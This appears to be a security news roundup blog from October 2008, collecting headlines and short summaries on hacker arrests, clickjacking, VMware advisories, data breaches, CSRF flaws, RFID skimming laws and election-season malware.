On a side note, many of the web addresses for Chinese cyber police stations include the number 110. For example, the Shandong Cyber Police web address is http://www.sd110.gov.cn/. In China, as well as Taiwan, 110 is similar to the 911 emergency number. However, in China, 110 is the exclusive contact number for the police. Other emergency services, such as the fire department, use different contact numbers. The fire department’s number is 119.

Chinese Cyber Police links just below map.

Israeli Super Hacker Ehud Tenenbaum "The Analyzer" May Be Extradited To US
http://www.nationalcybersecurity.com/blogs/843/Israeli-Super-Hacker-Ehud-Tenenbaum-The-Analyzer-May-Be-Extradited-To-US.html
Canada will be asked to extradite computer hacker Ehud Tenenbaum "The Analyzer" for alleged theft of millions of dollars.

According to the US, Tenenbaum was one of the masterminds who hacked into financial institutions in Russia, Turkey, Holland, Sweden, Germany and other countries.

Last month he was arrested in Canada for cyber theft from a local bank. He was about to be released on $30,000 bail when, just before his release, a new arrest order issued in connection with the U.S. extradition request kept him in prison.

Firefox extension blocks dangerous Web attack
A popular free security tool for the Firefox browser has been upgraded to block one of the most dangerous and troubling security problems facing the Web today.

NoScript is a small application that integrates into Firefox. It blocks scripts in programming languages such as JavaScript and Java from executing on untrusted Web pages. The scripts could be used to launch an attack on a PC.

The latest release of NoScript, version 1.8.2.1, will stop so-called "clickjacking," where a person browsing the Web clicks on a malicious, invisible link without realizing it, said Giorgio Maone, an Italian security researcher who wrote and maintains the program.

Clickjacking has been known for several years but is drawing attention again after two security researchers, Robert Hansen and Jeremiah Grossman, warned last month of new scenarios that could compromise a person's privacy or even worse, steal money from a bank account.

New and Updated VMware Security Advisories for VirtualCenter, ESXi, ESX, VCB and VMware Hosted Products

Today, VMware released a new version of VirtualCenter, VC2.5 Update 3, a new version of Virtual Consolidated Backup, VCB 1.1 Update 1, and patches for ESXi and ESX 3.5. These and the recently released versions of VMware's hosted products and patches for ESX 3.0.1, 3.0.2 and 3.0.3 address several security issues. The issues are described in a new and an updated security advisory published today. One of the fixed security issues is a privilege escalation on certain 64-bit guest operating systems, CVE-2008-4279. It allows an attacker with a login account on a guest operating system to elevate their privileges on that system. The flaw doesn't allow for compromising the host system. The other security issues involve password disclosure and an update to JRE.

Symantec to acquire MessageLabs for $695 million
Angela Moscaritolo October 08, 2008
With its acquisition of MessageLabs, a British online messaging and web security services provider, Symantec hopes to expand its software-as-a-service offerings.

European hackers charged with DDoS attacks in the U.S.
Angela Moscaritolo October 07, 2008
Two European men have been charged with hacking U.S. retail websites and causing more than $400,000 in damage through a series of distributed denial-of-service attacks in 2003.

Stolen McCain party laptop had minimal data safeguards
Dan Kaplan October 06, 2008
A laptop containing "strategic" GOP data was stolen from the Kansas City field office for Sen. John McCain -- but the machine lacked encryption.

Study: Hotel network security lacking
Angela Moscaritolo October 06, 2008
Hotel guests across the country could be connecting their laptops to an insecure connection, a new study concludes.

Dutch to MBTA: Sorry CharlieCard. Your crypto is crap-o
Two months after the Massachusetts Bay Transit Authority went to court to stop US students from talking about weaknesses in the CharlieCard RFID authentication system, researchers in the Netherlands have published evidence that the MIFARE technology that underlies Charlie (and many other mass transit systems) is fundamentally flawed.
October 08, 2008 - 06:20AM CT - by Joel Hruska

Clickjacking
Good Q&A on clickjacking:
In plain English, clickjacking lets hackers and scammers hide malicious stuff under the cover of the content on a legitimate site. You know what happens when a carjacker takes a car? Well, clickjacking is like that, except that the click is the car.

"Clickjacking" is a stunningly sexy name, but the vulnerability is really just a variant of cross-site scripting. We don't know how bad it really is, because the details are still being withheld. But the name alone is causing dread.
Posted on October 6, 2008 at 1:45 PM

Spammers Favor Obama Over McCain 7 to 1
http://voices.washingtonpost.com/securityfix/2008/10/spammers_favor_obama_over_mcca.html

Report: Data Breaches Expose About 30M Records in '08
http://voices.washingtonpost.com/securityfix/2008/10/516_data_breaches_in_2008_expo.html

Privacy survey urged for counterterror programs
News Brief, 2008-10-07
The National Research Council calls for all U.S. agencies to evaluate their programs based on how effective they are and whether they protect privacy.

TiVo Wins Appeal On Patents For Pause, Ffwd, Rwd
After years of wrangling, TiVo has won its day in court against Dish Network, formerly known as the EchoStar, when the Supreme Court declined to take up Dish Network's appeal, forcing the satellite television company to pay $104 million in damages. According to the article, 'TiVo originally won a patent infringement case in 2004 against Dish, which was then named EchoStar Communications. It charged that Dish illegally copied its technology, which allows people to pause, rewind, and record live television on digital video recorders.' Despite an injunction, Dish continued distributing its set-top boxes in the belief that the work-around they had implemented avoided infringing TiVo's patents. Now the case goes back to the lower court for review to determine if they did indeed steer clear of those patents.

New Bill To Rein In DHS Laptop Seizures
The Travelers Privacy Protection Act, a bill written by US Senators Russ Feingold, D-Wis., and Maria Cantwell, D-Wash., and Rep. Adam Smith, D-Wash., would allow border agents to search electronic devices only if they had reasonable suspicions of wrongdoing. In addition, the legislation would limit the length of time that a device could be out of its owner's possession to 24 hours, after which the search becomes a seizure, requiring probable cause.

Sequoia's Optical Scan Vote Counting Machines Giving Different Results Every Time
from the well-that's-reassuring dept

Supreme Court Hears Arguments on Bad Police Data
The Supreme Court hears arguments on the implications of police acting on their own inaccurate information. Police suspected that Herring, an Alabama resident, had a warrant. The police checked county records and finding no warrant checked a neighboring county which in error reported an outstanding warrant. Upon a search of Herring, as a result of the false warrant claim, he was found to be in possession of controlled substances. The case seeks a ruling from the court on whether the police can be insulated because they acted on erroneous information from a police county clerk. Criminal record database errors are further complicated by the practice of interlinking law enforcement databases.
Supreme Court Mull Whether Bad Databases Make for Illegal Searches, Wired News, October 4, 2008

Domaincontrol (GoDaddy) Nameservers DNS Poisoning
We knew it would be happening for the foreseeable future, until some version of SecDNS is implemented.

Adobe Flash Player "Clickjacking" Security Bypass Vulnerability
Issued 10 hours ago.
A vulnerability has been reported in Adobe Flash Player, which can be exploited by malicious people to bypass certain security restrictions and disclose potentially sensitive information.

'Clickjackers' could hijack webcams, microphones, Adobe warns

Why Security Pros Hate Microsoft SharePoint (and What to Do About It)
Microsoft's SharePoint collaboration platform is all the rage in today's business world, especially since third parties gained the ability to plug security holes. But managing it can still be a nightmare for IT security shops.

Court orders spammers to pay $236M to Iowa ISP

Shell fingers IT contractor in theft of employee data

New health-care privacy laws heighten need for HIPAA compliance in California

Friday, October 3, 2008

Security News Feed Friday 10/3/08

Grand jury indicts two Europeans over denial-of-service attacks in 2003
A federal grand jury has indicted two European men for allegedly orchestrating denial-of-service attacks against a pair of U.S.-based Web sites in 2003.

Lawyers want Windows Update used to push 'Vista Capable' lawsuit notices

Vendors rush to fix bug that could crash Internet systems

Researcher finds evidence of massive site compromise
Digs up cache of 200,000 site credentials for Fortune 500 firms, weapons makers, governments

CSRF Flaws Found on Major Websites - 9/29/2008 5:35:00 PM
Princeton University researchers reveal four sites with cross-site request forgery flaws and unveil tools to protect against these attacks

California makes it a crime to 'skim' RFID tags

Sysadmin admits stealing computers, office equipment from Navy

California outlaws RFID card skimming

Chinese Skype spies on users, researcher says

Frustrated researcher details iPhone security bugs

Many computer users lack basic security precautions, survey says

How to Root Out Bots in Your Network - 10/2/2008 5:40:00 PM
Expert gives tips on how to detect and remediate internal botnet infestations

Why Risk Management Doesn't Work - 10/2/2008 3:45:00 PM
Two new studies challenge current wisdom about calculating an enterprise's security risk -- and recommend rethinking the process

House.gov Still Plagued by E-mail Deluge
A glut of e-mail from constituents and special interest groups continued to pose problems for the Web sites for members of the U.S. House of Representatives on Thursday, as millions of Americans attempt to voice their opinions on the financial bailout package the day before an expected vote on the measure.

Second bill tackles laptop border searches
News Brief, 2008-10-02
Three U.S. lawmakers propose a law to limit the searches of laptops or other electronic devices to cases where customs agents have reasonable suspicion of illegal activity.

Credit card processors finally get clue, will ban WEP
Credit card processors have finally realized what security experts have known since 2001: WEP is next to worthless as a wireless security protocol, and they're finally banning its use in credit card processing systems—but not until mid-2010. The use of WEP was a major factor in the largest consumer data theft ever.
October 03, 2008 - 11:45AM CT - by Jacqui Cheng

Livefilestore URLs used in spam
October 1, 2008
Spammers are using files hosted on livefilestore.com to redirect users to suspect web pages.

Judge Won't Allow Researchers To Reveal Report On E-Voting Machines

Artemis Backstage #1: Malware Mapping
News about the Artemis project has been out for a little while. As the rollout continues we want to post some of the juicy backstage gossip here, making you some of the first people to see this outside of the core project team!

If you’ve not heard about the Artemis technology yet, it’s our “in-the-cloud”-based malware detection; head over to the McAfee Artemis micro-site. I highly recommend the podcast (hidden on the right-hand side) as my colleague Dimitry Gryaznov outtalks our communications guru Dave Marcus.

One of the things Artemis provides to researchers is very clear telemetry on active malware campaigns, and I want to share a few interesting examples. All the “measles maps” below show a one-day period and were all taken at the same time earlier today.

Cybergang moles steal company data
Dan Raywood October 02, 2008
Criminal gangs have been placing staff members in companies to operate as moles, an internet security expert said.

Wireless at Fiber Speeds
By Kate Greene, Friday, October 03, 2008
New millimeter-wave technology sends data at 10 gigabits per second.

Hijacking Satellite Navigation
By Erica Naone, Thursday, October 02, 2008
Sending false signals to GPS receivers could disrupt critical infrastructure.

Report: Adware supplies one third of all malware
CNET - Thu Oct 2, 7:57 PM ET
On Thursday, Panda Security released its report for the third quarter stating that adware is responsible for one third of all new malicious software. In particular, the security company cited increased use of fake antivirus scanners.

Wednesday, October 1, 2008

Security News Feed Wednesday 10/1/08

September 30, Washington Business Journal – (National)

Webroot identifies presidential campaign malware.

Webroot, a U.S.-based IT security vendor, says it has spotted the widespread deployment of malware hidden inside campaign videos for the presidential candidates of both major political parties. The problem stems, the firm says, from widespread usage of the Gnutella file-sharing network to disseminate hi-resolution campaign videos by the two candidates. According to Webroot, a quick search of the FrostWire network - which uses the Gnutella network format, apparently - indicated that of the 34 search results for "Obama Speech" 14 contained active malware while five of the 19 results for "McCain Speech" were found to be harboring malware. Source: http://security.itproportal.com/articles/2008/09/30/webroot-identifies-presidential-campaign-malware/

Transpacific undersea cable completed.

A crucial undersea fiber-optic cable that will provide more Internet capacity between the U.S. and China was completed Monday, according to news reports. Six of the world’s largest phone companies have finished building an 18,000-kilometer "Trans-Pacific Express" cable that will link the U.S., China, South Korea, and Taiwan, according to the Dow Jones news service. The high-speed link will provide more capacity for the region, which is currently served by a single low-capacity cable that provides connectivity between mainland China and the U.S. Most web traffic between the U.S. and China goes through Hong Kong or Japan. These routes can often cause transmission delays. The project, which cost about $500 million, was prompted when an earthquake off Taiwan’s coast in December 2006 severed several undersea data cables, which resulted in disrupted communications throughout much of Asia. The world’s largest phone companies decided that something had to be done to provide more infrastructure to the region.

Source: http://news.cnet.com/8301-1001_3-10053949-92.html

Kevin Mitnick detained, released after Colombia trip
Famed social engineer-cum-hacker tells a cautionary tale about the dangers of traveling into the U.S. with a laptop, and sending packages back home from Bogota.
Wed, Oct 01 04:00:00 PDT 2008

Apple selling unlocked iPhone 3G in Hong Kong

T-Mobile stops taking Android phone orders

IBM releasing iNotes for iPhone

Study: Routine Misbehavior by End Users Can Lead to Major Data Leaks

Many end users don't understand the risks associated with breaking company security policies, report says

Attackers Mix Online, Offline Exploits to Mask Financial Fraud

Cybercriminals split the attack cycle into pieces that may appear unrelated in order to evade detection

New DOS Attack Is a Killer

With a newly discovered denial-of-service attack against broadband Internet connections, machines don't come back

A Simple Sync Can 'Sink' Your PC

Researchers release proof-of-concept for attack on Windows' ActiveSync 4.0

Wall Street meltdown expected to drive risk management investments http://cwflyris.computerworld.com/t/3693514/6339517/142045/2/

Health hazards for IT workers -- how that desk job wears your body down http://cwflyris.computerworld.com/t/3693514/6339517/142043/2/

Microsoft: Bad things happen to firms that use unlicensed Windows http://cwflyris.computerworld.com/t/3691317/6339517/142001/2/

Identity theft victim wins right to sue county clerk over posting of personal data http://cwflyris.computerworld.com/t/3691317/6339517/142005/2/

Toshiba to ship 256GB solid-state drives in October http://cwflyris.computerworld.com/t/3691317/6339517/142011/2/

Stolen Hard Drives Hold Sensitive Data of 50,000 UK Ministry of Defence Staff (September 26 & 29, 2008)

Personally identifiable information of as many as 50,000 UK military staff has been compromised due to the theft of three portable hard drives from the RAF Innsworth base in Gloucestershire. The unencrypted data include addresses, bank account numbers and medical records. The theft is under investigation by Ministry of Defence (MoD) police and Gloucestershire police. The MoD plans to notify all individuals affected by the data security breach.
http://www.computerworlduk.com/management/government-law/public-sector/news/index.cfm?newsid=11244
http://www.mirror.co.uk/news/top-stories/2008/09/26/safety-fears-for-50-000-raf-staff-after-personal-files-are-stolen-115875-20754809/
http://www.theregister.co.uk/2008/09/29/raf_usb_drives_stolen/
[Editor's Note (Honan): The stolen hard drives were apparently not encrypted as they were located in a secure facility. I guess the RAF has learnt a lesson in defense in depth and that you need to ensure you include layers of defense in the physical, logical and personnel domains.]

Los Alamos Needs to Implement Stronger Security, Says GAO (September 25, 26 & 29, 2008)
According to a report from the US Government Accountability Office (GAO), cyber security vulnerabilities at the Los Alamos National Laboratory (LANL) could expose sensitive data. Although LANL has begun implementing previously recommended measures to improve data security, there are still holes in its unclassified network, which holds information about export control and sensitive employee data. The network itself has strong authentication measures in place, but once access is granted, users can find their way around the other security measures to access the sensitive data. The report also found weaknesses in physical security at LANL. The GAO made several recommendations for improving LANL's cyber security posture, including "requir[ing] the Director of LANL to ... ensure that the risk assessment for the unclassified network evaluates all known vulnerabilities and is revised periodically and strengthen policies with a view toward ... reducing ... foreign nationals' access to the unclassified network."
http://www.theregister.co.uk/2008/09/29/los_alamos_cyber_insecurity/
http://www.fcw.com/online/news/153921-1.html
http://www.nextgov.com/nextgov/ng_20080929_5288.php
http://www.gao.gov/new.items/d081180t.pdf

Secondhand VPN Router Connects to Previous Owners' Network
http://news.bbc.co.uk/2/hi/technology/7635622.stm

... Overall, pay for security certifications was up 0.4% during the last six months and 2% during the last year (through July 1, 2008), compared with the downward trend of all IT certifications, which lost 2.5% during the last six months and 3.5% during the past year.
http://searchsecurity.techtarget.com/news/article/0,289142,sid14_gci1331613,00.html

NEW DATA BREACH COMPLIANCE RULES FOR RETAILERS IN CALIFORNIA
An amended version of the Consumer Data Protection Act, or AB 1656, is sure to be signed by Governor Schwarzenegger after the California State Assembly approved it by a 74-1 margin.
...
For an inside look at the new rules, visit AB 1656. As more stringent legislation is enacted, businesses need to be prepared and know where their data risks reside.

CSRF Flaws Found on Major Websites
Princeton University researchers reveal four sites with cross-site request forgery flaws and unveil tools to protect against these attacks

The data center from hell, Part 1
Seen any good horror movies lately? Here's the script for a security geek's version of the classic slasher flick.

The data center from hell, Part 2
Buitron: One circuit breaker was in a garage bay where company trucks parked. Anyone from the street could walk in at any time and throw the switch on the breaker box, cutting off power instantly to all of the company's servers.

Google sets up government sales shop to preach gospel of cloud computing to federal agencies

Adobe vulnerability exploits are mounting
Chuck Miller September 26, 2008
A new and previously unknown exploit toolkit exclusively targets Adobe's PDF format, and large numbers of PDF attacks continue.